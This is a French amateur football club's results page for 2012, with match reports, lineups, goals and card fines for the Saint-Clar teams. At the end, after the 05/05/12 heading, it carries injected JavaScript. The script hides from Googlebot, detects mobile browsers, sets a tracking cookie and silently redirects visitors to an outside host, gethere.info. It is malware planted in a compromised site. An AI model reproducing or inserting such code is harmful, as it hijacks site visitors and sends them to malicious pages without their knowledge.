Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. F. Larribeau, 5. Benjamin. Peotta, 6. A. Virelaude, 7. F. Moussaron, 8. V. Taupiac, 9. N. Cantaloup (Cap), 10. C. Suzes, 11. L. Delavat. Rempl: 12. T. Hrodej, 13. W. Schoen, 14. S. Buttigieg, 15. L. Gamot, Coach : J. Blancard Buts : F. Moussaron (80ème), L. Delavat (90ème) Avertissements : N. Cantaloup (contestation), F. Moussaron (anti-jeu), T.Hrodej (tacle dangereux) Pour ce 3ème Tour de Coupe de France, les Saint-Clarais étaient opposés à Séméac, équipe évoluant en Promotion Honneur, deux divisions au dessus des jaunes et rouges et qui était encore en DHR l’an dernier…un gros poisson en perspective. Le début du match est équilibré, Séméac usant d’un jeu direct sur leur seul attaquant de pointe à la surprise générale. La première grosse occasion est pour St Clar, sur un déboulé coté droit, « Ludo » laisse son vis-à-vis sur place, centre au 6m, le défenseur de Séméac rate son intervention et « Nico » surpris ne peut reprendre le centre. Les visiteurs toujours dans le même registre de jeu, ne tentent que des frappes de loin. St Clar pousse et obtient un corner, sur une déviation, « Palof » contrôle le ballon de la poitrine, se retourne, fais face au gardien et aux deux défenseurs positionnés devant la ligne de but et marque de près, but refusé pour hors jeu… colère des jaunes et rouges. Ne se laissant pas démobiliser par ce fait de jeu, les locaux restent concentrés dans leur match. Juste avant la pause, Séméac obtient plusieurs corners mais la défense de St Clar tient bon. Mi-temps 0-0. Après la pause des citrons, St Clar continue son pressing en milieu de terrain. A la 50ème minute « Mouss » récupère un ballon au 30m, prend de vitesse le dernier défenseur et sert « Nico » sur un plateau pour l’ouverture du score…mais l’arbitre de touche signale un hors jeu…gronde dans les tribunes et sur le terrain. Dans la foulée, Séméac obtient un corner et après un cafouillage, l’attaquant visiteur fusille « Bats » de près ,0-1. Déstabilisés par ces faits de jeu, les jaunes et rouges ont une baisse de régime et Séméac commence à enfin jouer au football, et sur une action, l’attaquant adverse revenant de hors jeu, reçoit un ballon de son milieu de terrain et va gagner son duel face à « Bats », 0-2. Séméac gère son avance mais à 10mn de la fin du match « Mouss » est crocheté dans la surface, pénalty, 1-2. Les locaux retrouvent leur esprit Coupe et partent à l’attaque, mais les frappes sont trop approximatives. A la 89ème minute, sur un contre, l’attaquant de Séméac parti plus qu’à la limite de la limite du hors jeu pour ne pas dire hors jeu passe le ballon à son coéquipier qui marque dans le but vide, l’arbitre de touche ne dit rien, et l’arbitre central valide le but malgré les contestations, 1-3. Vexés dans leur orgueil par ces décisions, les St Clarais continuent d’attaquer et suite à l’engagement, « Ludo » d’un joli retourné lober réduit le score, 2-3. Durant les dernières minutes de cette rencontre les locaux vont pousser grâce aux occasions de « Tom » et de « Mouss » mais le score ne bougera plus. L’aventure Coupe de France s’arrête là pour les St Clarais qui n’ont pas à rougir de cette défaite, bien au contraire… En photos :
Résultats du week-end (08/09/12):
CHAMPIONNAT D’EXCELLENCE: ST CLAR – PAVIE II : 1-1
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. A. Virelaude, 5. Benjamin. Peotta, 6. V. Taupiac, 7. F. Moussaron, 8. R. Boukkera, 9. N. Cantaloup (Cap), 10. C. Suzes, 11. L. Fabbro. Rempl: 12. D. Solagna, 13. T. Hrodej, 14. S. Buttigieg. Coach : J. Blancard Buts : A. Virelaude (25ème) Avertissements : A. Davasse (tacle dangereux) Pour ce premier match de championnat, St Clar était opposé à une belle réserve de Pavie. Les visiteurs sont les premiers à se mettre en action et il faut une parade de « Bats » pour détourner le ballon en corner. Nos St Clarais ont du mal à rentrer dans le match et les erreurs techniques se multiplient mais les visiteurs n’en profitent pas. A la 25ème minute sur un coup franc éloigné de « Palof », le gardien juge mal la trajectoire et après avoir frappé le poteau, le ballon rentre dans les buts, 1-0. Pavie se lance à l’attaque et dans la foulée égalise d’une superbe frappe au 30m en pleine lucarne, imparable, 1-1. Les joueurs de St Clar reprennent possession du ballon, notamment grâce à une grosse activité de « Mouss » en milieu de terrain mais les tirs sont trop approximatifs pour inquiéter le gardien visiteur. Mi-temps 1-1. Après la pause des citrons, St Clar va monopoliser le ballon mais butera sur la défense de Pavie à plusieurs reprises. Les joueurs visiteurs resteront dangereux en contre attaque et il faudra une bonne défense St Claraise autour d’un « Palof » intraitable dans ses interventions. Dans les 5 dernières minutes de la rencontre, St Clar va littéralement assiéger les buts visiteurs, mais ni les corners à répétition et les coups francs excentrés n’arriveront à forcer le verrou Pavien. Score Final : 1-1. Le week-end prochain réception de Séméac (PH) pour le 3ème Tour de Coupe de France.
Les joueurs du SCSC à l’entrée du terrain “Palof et Mouss” auteur d’un très bon match
« Coach Julien » sous les couleurs Saint-Claraise
CHAMPIONNAT DE 1ère DIVISION: ST CLAR II – ST J.LECOMTAL : 1-1
Equipe : 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau (Cap), 6. W. Schoen, 7. L. De Montbron, 8. V. Lucas, 9. J. Lasserre, 10. P. Pracca, 11. G. Maignaut. Rempl: 12. Luc. Fabbro, 13. F. Gobatto, 14. J. Vivier. Coach : C. Boukkera Buts : J. Lasserre (60ème) Avertissements : T. Larribeau (geste d’humeur), W.Schoen (anti-jeu) Pour ce premier match de championnat, les réservistes St Clarais étaient confrontés à St J.Lecomtal. Malgré une équipe remanier et un système de jeu différent, les St Clarais sont les premiers à tirer au but en la personne de « Pepe » suite à un bon travail de la nouvelle recrue « Pampouille », mais le ballon frôle le poteau. Beaucoup de passes approximatives et de déchets techniques vont rythmer cette première mi-temps. Les joueurs visiteurs sont tout près d’ouvrir le score à quelques minutes de la pause sur une tête décroisée qui effleure la barre transversale de « Lolo ». Mi-temps 0-0. Après la pause pâtes de fruits, les joueurs de St J.Lecomtal rentrent plus vite dans le match que les St Clarais et suite à une touche vite jouée, l’attaquant adverse est crocheté dans la surface, pénalty, 0-1. Touchés dans leur orgueil, les jaunes et rouges qui jouaient en bleu pour ce match monopolisent le ballon et multiplient les actions et sur l’une d’elles, « Bono » récupère un ballon dans la surface, le transmet à « Pampouille » qui d’un enroulé du droit en pleine lucarne égalise, 1-1. En bon Capitaine, « Titi » « qui au passage fêtait son anniversaire », montre l’exemple et intensifie les percées pour essayer d’arracher la victoire, mais rien ne rentre. A quelques minutes de la fin, « Bono » part plein axe défier le gardien adverse, mais perd son duel, le score ne bougera plus. Score final 1-1. Prochain match à Labejan le dimanche 22 septembre à 13h.
Les joueurs avec leur nouveau tee-shirt d’entrainement « Coach Bouki » en plein discours à la mi-temps
« Titi » qui fêtait ses 45 printemps le jour du match
Résultat du week-end (01/09/12):
2ème Tour de la COUPE DE FRANCE : ST SAUVY – ST CLAR : 1-2
Equipe : 1. L. Gamot, 2. D. Solagna, 3. R. Clavel, 4. A. Davasse, 5. Benjamin. Peotta, 6. A. Virelaude, 7. F. Moussaron (cap), 8. V. Taupiac, 9. C. Suzes, 10. A. Mouchet, 11. L. Fabbro. Rempl : 12. S. Buttigieg, 13. C. Maillasson, 14. Baptiste. Peotta, 15. C. Boukkera. Coach: J.Blancard Buts : V. Taupiac (20ème), L. Fabbro (22ème) Avertissements : A. Virelaude (contestation), L. Gamot (gain de temps) Saint-Clar débute très bien le match et domine le début de match. Les jaunes et rouges se procurent de nombreuses occasions, en particulier par « Lolo » ou « Cisou », mais n’arrivent pas à conclure. Il faut attendre la 20ème mn pour l’ouverture du score. Au départ, une superbe transversale de « Nono » suivie d’un centre au premier poteau que « Lolo » dévie intelligemment au nez et à la barbe du gardien local. « Taupi », seul au point de pénalty n’a plus qu’à pousser la balle au fond du but vide. Sur leur lancée, les Saint-Clarais repartent à l’attaque et suite à une faute d’un joueur de Saint-Sauvy, c’est « Raphy » qui se charge du coup-franc. D’une belle frappe, il « dépose » la balle au point de pénalty sur la tête de « Lolo » qui trompe le gardien. A 2 à 0, on se dit que le plus dur est fait mais Saint-Sauvy ne s’avoue pas vaincu et, juste avant la pause, il faut toute la classe de « Lolo Gamot » pour repousser une tête à bout portant. La seconde période est beaucoup plus difficile pour Saint-Clar face à des locaux qui jouent leur va tout et mettent souvent en danger nos défenseurs. A plusieurs reprises, les attaquants locaux voient leur frappes raser le cadre ou même toucher la transversale. Côté Saint-Clarais, une seule véritable occasion avec une tête de « Mouss » qui finit sa course sur la base du poteau. Les entrées en jeu de « Stephen » et « Christopher » ne changeront rien et à 5mn du terme, ce que les nombreux supporters Saint-Clarais redoutaient se produit avec la réduction du score par les locaux. Heureusement, l’esprit « Coupe » est toujours Saint-Clarais et nos joueurs, avec les conseils avisés de « Julien », sauront gérer cette fin de match et préserver leur qualification pour le 3ème tour de la Coupe de France.
“Raphaël Clavel” l’homme du match
Résultat du week-end (25/08/12):
1er Tour de la COUPE DE FRANCE : AIGNAN – ST CLAR : 0-1
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. F. Buot, 5. Benjamin Peotta, 6. A. Virelaude, 7. F. Moussaron, 8. C. Malateste, 9. N. Cantaloup (cap), 10. C. Suzes, 11. R. Boukkera. Rempl : 12. A. Mouchet, 13. V. Taupiac, 14. D. Solagna. Coach: J.Blancard Buts : A.Mouchet (60ème) Avertissements : C. Malateste (comportement violent) carton rouge Pour ce premier match officiel de la saison, St Clar était opposé à Aignan au 1er tour de la Coupe de France. Une équipe toujours difficile à jouer sur ses terres. Sous la direction de leur nouveau coach « Julien », les joueurs du Sporting sont les premiers à partir à l’attaque, et sur le premier corner, « Palof » croit ouvrir le score mais l’arbitre refuse le but, sifflant une charge irrégulière sur le gardien. Dans la foulée, Aignan contre attaque et sur un décalage côté gauche, l’attaquant se retrouve face à « Bats » qui détourne du bout du pied en corner. S’ensuit une domination plus ou moins St Claraise, avec notamment « Cisou » et « Nico » en tant que danger numéro un. Les vingt dernières minutes de cette première mi-temps sont à mettre au crédit d’Aignan, ils vont multiplier les occasions plus ou moins franches, mais la défense des jaunes et rouges tiendra le coup malgré quelques frayeurs, la mi-temps est sifflée au bon moment, 0-0. Après la pause, Aignan redémarre sur le même tempo que leur fin de première période, et il faut une superbe parade de « Bats » sur une tête à bout portant pour éviter l’ouverture du score. La partie baisse d’intensité pendant quelques minutes mais sur un tacle « Kinou » attrape la cheville d’un joueur local, carton rouge… Dans la foulée, sur une contre attaque dont il a le secret, « Mouss » récupère le ballon, s’élance, passe deux joueurs et lance en profondeur notre Cristiano Ronaldo St Clarais « Antho Mouchet » qui ne se fait pas prier pour expédier le ballon en pleine lucarne à l’entrée de la surface, 0-1. Pendant 10mn et malgré leur infériorité numérique les jaunes et rouges vont jouer l’attaque. Mais les joueurs d’Aignan vont reprendre la possession du ballon et les actions vont se multiplier en cette fin de match, mais notre défense et surtout « Bats » est dans un grand soir, il va enchaîner les arrêts décisifs, notamment dans les arrêts de jeu où il va chercher en lucarne un ballon enroulé. Le score ne bougera plus, qualification du Sporting pour le 2ème tour de la Coupe de France qui aura lieu le week-end prochain.
1er Tour de la Coupe de France « Bats » l’homme du match
Classement Final des Sanctions (10/06/12) :
1er: Benjamin Sabarros avec 7 cartons jaunes pour un total de 144€
2ème: Fabien Larribeau avec 4 cartons jaunes et 1 carton rouge pour un total de 99€
3ème: Cyril Malateste avec 5 cartons jaunes pour un total de 93€
Tableaux des Sanctions:
Classement Final des Buteurs (04/06/12) :
1er: Nicolas Cantaloup avec 22 buts 2ème: Vincent Taupiac avec 10 buts 3ème: Frédéric Moussaron avec 9 buts
Félicitation à “Nico” qui termine meilleur buteur du club cette saison
Classement des buteurs en détails:
Résultats du week-end (02/06/12) :
ST CLAR – L’ISLE JOURDAIN : 1-0
Pour le dernier match de cette saison face au futur champion d’Excellence ainsi que pour le dernier match du coach « Steph Portillo » à la tête de l’équipe I du Sporting, les joueurs avaient à cœur de terminer sur une bonne note et de montrer que leur 2ème place au classement n’était pas usurpée. D’entrer de jeu les jaunes et rouges se lancent à l’attaque et sur une belle ouverture de « Papy » par-dessus la défense, « Nico » d’un superbe contrôle, se place et tire, mais le gardien détourne le ballon sur la barre. Les St Clarais monopolisent le ballon et encore « Nico » est tout près d’ouvrir le score mais le gardien adverse sort le ballon. A la demi heure de jeu, sur une contre attaque de l’Isle Jourdain, « Bulle » fauche son adversaire dans la surface, pénalty, mais l’attaquant le loupe, les quelques mots de « Papy » y sont peut être pour quelque chose… Les joueurs du Sporting repartent de l’avant, « Nico » rentre dans la surface et s’écroule, l’arbitre ne bronche pas alors que le pénalty semblait évident. L’Isle Jourdain procède en contre attaque, mais « Bernard » placé en défense centrale ne laisse rien passer. On se rapproche de la mi-temps, « Palof » d’une passe appuyée lance « Nico » en profondeur qui est fauché par le dernier défenseur…l’arbitre fait signe de jouer. Mi-temps 0-0. Après la pause, un duel au milieu de terrain va avoir lieu, « Mouss et Benben » ne lâcheront rien dans cette 2ème mi-temps. Et à 5mn de la fin, l’arbitre désigne le point de pénalty pour une main d’un joueur de l’Isle Jourdain dans la surface, « Nico » le transforme sous la barre, 1-0. Malgré les dernières attaques des joueurs adverses, le score ne bougera plus. Une haie d’honneur sera organisée par les joueurs du Sporting pour saluer les Champions d’Excellence, imités dans la foulée par les joueurs de L’Isle Jourdain pour saluer leur dauphin en championnat et clôturer ainsi cette saison.
« Steph Portillo » à la tête de l’équipe I du Sporting « Bernard » auteur d’un très bon match
ST CLAR II –MANCIET II: 2-3
Pour ce dernier match de championnat, les réservistes avaient organisé un Barbecue d’avant match, la bonne humeur était au rendez vous comme à l’accoutumée… Le début du match est compliqué, dû à un apéro consistant pour certains et une forte chaleur, au bout de 15mn le score est déjà de 0-2 pour les visiteurs. Coach « Bouki » recadre tout ça et « Tom » réduit le score sur une frappe tendue en coin, 1-2. Les jaunes et rouges jouent l’attaque à tout va et sur une contre attaque juste avant la mi-temps, Manciet marque le but du break, 1-3. Après la pause, un pénalty est sifflé pour une faute sur « Bono », « Taupi » se charge de tirer le pénalty en l’absence de « Matthieu » malade mais présent en tant qu’arbitre de touche, 2-3. St Clar monopolise le ballon et se crée des occasions, mais rien ne rentre, barre transversale de « Pepe » sur une tête croisée, et poteau de « Faby » sur une tête. A 5mn de la fin, sur un centre de « Tom » l’homme en forme du jour, on croit à l’égalisation St Claraise mais un défenseur adverse se jette sur la ligne pour sortir le ballon. Plus rien ne sera marqué dans les dernières secondes de la rencontre. Malgré cette défaite, la réserve du Sporting clôture une belle saison, en se classant 4ème du championnat et en gagnant pour la 3ème année consécutive le Challenge du District.
Les grilladoux en chef, « Titcho » et « Lolo » Barbecue d’avant match
Groupe de la II qui se classe 4ème en championnat et vainqueur du Challenge du District
Résumé Finale Challenge du District (26/05/12) :
AUCH III – ST CLAR II : 1-2
Vainqueur pour la 3ème année consécutive, le triplé !!
L’EQUIPE : 1.L.Gamot, 2.D.Solagna, 3.M.Berto, 4.F.Larribeau, 5.F.Cau, 6.V.Taupiac (Cap), 7.F.Moussaron, 8.T.Hrodej, 9.S.Jeangrand, 10.C.Malateste, 11.S.Xiberras, 12.T.Larribeau, 13.P.Pinto, 14.P.Pracca, Coachs : C.Boukkera et S.Portillo, Soigneurs: V.Lucas et J.Arriola
Tout d’abord cette journée démarra par un RDV donné à 10h15 au groupe de la réserve par coach « Bouki » au terrain de St Clar pour la mise en place tactique et un léger réveil musculaire. Ensuite départ pour le Restaurant de l’Aérodrome à Auch pour un menu sportif d’avant match puis direction le Moulias… Face à une jeune et talentueuse équipe d’Auch III, les joueurs du Sporting ont encore montré que leur solidarité et l’expérience acquises lors des finales précédentes allaient s’avérer payantes. Dès le coup d’envoi, ceux sont les joueurs locaux qui prennent possession du ballon et du match, deux corners coup sur coup mettent la défense des rouges et jaunes en danger, puis c’est ensuite «Lolo Gamot» qui sort la parade face à l’attaquant Auscitain. Dans la fouler, le meneur de jeu d’Auch pénètre dans la surface, use de sa technique et centre en retrait pour son attaquant qui frappe, « Faby » détourne le ballon mais ce n’est pas suffisant, but, 1-0. Ce but aura permis de réveiller les St Clarais, « Simon » lance la première attaque, puis c’est au tour de « Xib » mais il pousse trop son ballon. Les rouges et jaunes obtiennent un coup franc excentré au 40m, « Kinou » s’applique et trouve « Mouss » au second poteau qui d’une jolie tête croisée en lucarne égalise, 1-1. Les réservistes continuent leur pressing et sur une longue touche, un défenseur d’Auch touche le ballon de la main dans la surface de réparation, l’arbitre désigne le point de pénalty, que « Matthieu » transforme sans trembler comme à l’accoutumée, 1-2. Auch repart à l’attaque, un lob frôle le but de « Lolo ». On se rapproche de la mi-temps, suite à une passe en profondeur, l’attaquant local vient au contact du défenseur et s’écroule, pénalty pour l’arbitre, grogne des St Clarais. « Lolo » spécialiste en arrêt de pénalty, ne déroge pas à sa réputation et détourne la frappe en corner, le tournant du match juste avant la mi-temps. Après la pause, nos rouges et jaunes vont adopter une tactique défensive et vont procéder par contre en laissant volontairement le jeu aux joueurs d’Auch. Et ceux sont les St Clarais qui vont avoir les meilleures occasions, tout d’abord par « Tom » qui rate de peu son duel face au gardien, puis « Simon » qui s’est donné sans retenue durant tout le match. Entre temps « Lolo » aura fini d’écœurer les joueurs locaux en claquant une reprise de volée qui partait au but. « Xib » passé au avant poste va donner le tournil aux défenseurs d’Auch en s’imposant physiquement dans chaque duel et ses deux tirs sont tout près de faire mouche mais le gardien adverse reste vigilant. Les coachs « Bouki » et « Steph Portillo » font rentrer pour les 20 dernières minutes « Titi » et « Titcho » pour apporter toute leur expérience. Et à 5mn de la fin, l’infatiguable « Mouss » y va de son rush, lancé sur le côté gauche, il tente le grand pont sur son vis-à-vis, le réussit, se retrouve face au gardien mais celui ci s’interpose. Les dernières minutes de cette rencontre seront gérées de façon intelligente par tout ce groupe de copains, ils laisseront éclater leur joie au coup de sifflet final. Le Sporting remporte pour la 3ème année consécutive le Challenge du District (2010, 2011, 2012), historique pour le SCSC mais aussi pour le District du Gers. Saint-Clar rentre encore dans l’histoire du football gersois.
Une bande de copains solidaires “Lolo Gamot” l’homme de cette finale
Résultats du week-end (20/05/12) :
LABEJAN – ST CLAR : 2-1
L’équipe première du Sporting amputée de nombreux titulaires était aussi du déplacement à Labejan en ce dimanche après midi. La première mi temps se résumera à un duel du milieu du terrain, la seule occasion franche sera l’œuvre de « Bono » partit à la limite du hors jeu mais le gardien adverse gagnera son duel. Mi-temps 0-0. La deuxième période sera plus animée, au bout de 10mn de jeu, suite à une déviation de la tête de « Ludo », « Robert » récupère le ballon dans la surface de réparation et s’écroule, pénalty transformé par « Nico », 0-1. Les locaux reprennent la possession du ballon et égalisent suite à un joli centre et une belle finition de leur attaquant, 1-1. St Clar joue en contre attaque et sur l’une d’elle « Bono » est tout près de redonner l’avantage aux siens mais le gardien sort victorieux. A 5mn de la fin, Labejan obtient un corner qui fera mouche, 2-1. Les rouges et jaunes se jettent alors à l’attaque et juste avant le coup de sifflet final suite à un coup franc travaillé de « Bats » au deuxième poteau, « Papy » d’une tête plongeante rate l’égalisation de très peu. Fin du match, une défaite sans conséquence au classement puisque l’équipe I est sûre de finir 2 ème du championnat d’Excellence.
« Bono » auteur d’un bon match avec l’équipe I
LABEJAN II – ST CLAR II : 2-3
Pour cette avant dernière journée de championnat, les réservistes se déplaçaient à Labejan. Les premières attaques sont à mettre au crédit des joueurs du Sporting, usant de ballons en profondeur mais la finition n’était pas au rendez-vous. Le jeu s’équilibre et au bout de 30mn sur un ballon perdu par notre défense, l’attaquant local en profite pour ouvrir le score d’un tir enroulé dans le petit filet, 1-0. Les jaunes et rouges réagissent et se lancent à l’attaque, « Mouss » est tout près d’égaliser suite à une de ses chevauchées dont il a le secret. Sur l’action suivante, l’arbitre désigne le point de pénalty pour une main d’un joueur de Labejan dans la surface, « Mat » le transforme sous la barre, 1-1. A quelques minutes de la pause, « Kinou » lancé en profondeur, dribble le gardien mais pousse trop son ballon… mi-temps. Dès le retour des vestiaires, « Mouss » redonne l’avantage à St Clar suite à un exploit personnel, 1-2. Labejan repart à l’attaque et trouve par deux fois les montants de « Jason » arrivé en cours de match. A 10mn de la fin, sur une contre attaque « Simon » se retrouve seul face au gardien mais son tir passe au dessus, le break est loupé. Dans la foulée, Labejan obtient un coup franc au 40m, le tireur tente le coup et marque, 2-2. On s’achemine vers le match nul, mais « Simon » récupère le ballon au 25m, avance et d’un tir croisé trompe le gardien, 2-3. Fin de match, la réserve du Sporting s’empare de la 4ème place du championnat au détriment de son adversaire du jour et prépare au mieux sa finale du Challenge du District du week-end prochain contre Auch III.
La joie des réservistes dans le vestiaire
Match en retard (17/05/12) :
ORDAN LARROQUE II – ST CLAR II : 2-3
Pour ce match en retard de la 19ème journée, les réservistes se déplaçaient à Ordan Larroque. Le début du match est en faveur des St Clarais, multipliant les occasions devant le but adverse, tout d’abord un tir de « Kinou » bien arrêté par le gardien. Quelques instants après « Kinou » récidive au 20m mais le gardien repousse sa frappe en corner. Sur le corner, « Titcho » tente un tir lobé de 25m que le gardien détourne…sur « Michou » mais son tir sans contrôle frôle le poteau. Sur une contre attaque, les locaux se créent leur première occasion, « Lolo » doit s’y reprendre à deux fois pour bloquer le ballon. Sur le dégagement, « Kinou » récupère le ballon, le transmet à « Mouss » au milieu de terrain, qui avance et qui décroche un tir tendu au 25m, petit filet, 0-1. Sur le coup d’envoi, Ordan Larroque part à l’attaque, leur milieu de terrain lancé sur le côté gauche rendre dans la surface, sans être gêné, il centre au deuxième poteau et trouve son attaquant, 1-1. Après la pause, les rouges et jaunes vont monopoliser le ballon, sur un centre de « Tom », la tête de « Bono » frôle la lucarne. Les occasions se multiplient et sur l’une d’elles, « Taupi » décalé sur le côté gauche centre au deuxième poteau pour « Kinou » qui avait bien suivi l’action, 1-2. Quelques minutes après, « Pepe » lance « Kinou » en profondeur qui résiste au défenseur adverse et lobe le gardien sorti à sa rencontre, 1-3, but du break. St Clar aurait pu à plusieurs reprises aggraver le score mais ce sont les joueurs locaux qui réduiront le score à 5mn de la fin, 2-3. Grâce à cette victoire, la réserve du Sporting consolide sa 5ème place au classement.
Les réservistes pendant l’échauffement avant leur match
Résultat du week-end (12/05/12) :
ST CLAR II – PAUILHAC II : 7-0
Pour cette 20ème journée de championnat, les réservistes St Clarais recevaient leurs voisins Pauilhacais dans un derby sans enjeu… Les rouges et jaunes sont les premiers à se lancer à l’attaque et au bout de 25mn de jeu, « Kinou » d’un superbe coup franc sous la barre ouvre le score, 1-0. St Clar essaye de poser le jeu et sur un changement d’aile, notre très jeune « Titcho » qui avait senti le coup se retrouve face au gardien après une course de 80m, pousse le ballon et s’écroule dans la surface, pénalty indiscutable que convertit « Xib » sans trembler, 2-0. Après la pause, les réservistes vont s’efforcer à faire vivre le ballon le plus possible et les occasions vont se multiplier, « Kinou » à la limite du hors-jeu récupère un ballon au 20m et va battre le gardien de près, 3-0. Après une action bien construite partie de « Faby », « Kinou » centre au deuxième poteau pour « Xib » libre de tout marquage et ne se fait pas prier pour aggraver le score, 4-0. « Mouss » va y aller de son doublé aussi, le premier but sur un tir placé au 20m et le deuxième tout en abnégation, 6-0. Et à 5mn de la fin, notre sénateur du soir « Faby » y va de son but, un lob tout en finesse au 25m, 7-0. La réserve conforte ainsi sa 5ème place au classement.

Résultat du week-end (05/05/12) :
ST CLAR I – VIC FEZENSAC II : 2-0
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}